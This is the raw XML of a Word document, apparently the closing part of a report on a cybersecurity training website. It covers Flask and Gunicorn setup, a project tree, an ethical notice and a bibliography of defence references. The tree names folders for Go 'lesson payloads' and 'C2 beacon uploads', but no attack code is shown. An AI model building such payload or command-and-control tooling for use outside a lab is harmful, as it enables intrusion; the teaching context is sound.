        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">Create virtual environment python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E4BB17B" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate virtual environment Windows: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">\Scripts\activate| Linux/Mac: source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E47CF3" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">Install dependencies pip install flask </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="409A31C5" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>That is all that is needed — no other packages required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767434F2" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not supported on windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632014B5" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Run locally python webpage.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C75A10" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Site runs at </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="4493F8"/>
          </w:rPr>
          <w:t>http://localhost:8000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AD710BF" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">Run with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> (production) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> --bind 0.0.0.0:8000 --workers 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>webpage:app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07AA4FAC" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Note on Ports Default port is 8000. If port 8000 is already in use on your machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF3C9F" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>python webpage.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62857002" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask will show the port in terminal output Or with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a different port: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> --bind 0.0.0.0:5001 --workers 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>webpage:app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> When deployed to Kubernetes the site is exposed on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>NodePort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426EB2C" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">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 xml:space="preserve">Project Structure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>├──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> webpage.py # Main Flask app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>├──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> templates/ # HTML pages </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>├──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> static/ # CSS and assets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>├──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>downloadables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>├──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>lessonDocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">/ # Word document walkthroughs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>└──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>lessonPayloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve">/ # Go source files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>└──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> uploads/ # C2 beacon uploads (only if implemented from front end c2 section and configured not in form of downloadable due to ethical considerations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418C6C8" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Ethical Notice All materials are for educational use in a controlled lab environment only. No compiled binaries are distributed publicly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68F26B" w14:textId="77777777" w:rsidR="009B66DB" w:rsidRDefault="009B66DB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735D96F4" w14:textId="49E33B5B" w:rsidR="002C0DF0" w:rsidRDefault="00793873">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bibliography</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="6874F84A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A660D37" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6815EB1E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Amazon Web Services (2024) Amazon EC2 User Guide for Linux Instances. [Online]. Available at: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE9CC92" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4359BB61" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bianco, D.J. (2013) The Pyramid of Pain. [Online]. Available at: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647656DF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2AEF92AA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hutchins, E.M., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cloppert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, M.J. and Amin, R.M. (2011) Intelligence-Driven Computer Network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains. Lockheed Martin Corporation. [Online]. Available at: https://lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA3B94" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="262C82F8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE Corporation (2024) MITRE ATT&amp;CK Framework. [Online]. Available at: https://attack.mitre.org [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A934A5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3A555B88" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Russinovich, M. and Garnier, T. (2023) Sysmon v15.0. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — Microsoft. [Online]. Available at: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A55615" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1CE45021" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SwiftOnSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (2024) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-config: Sysmon configuration file template. GitHub. [Online]. Available at: https://github.com/SwiftOnSecurity/sysmon-config [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
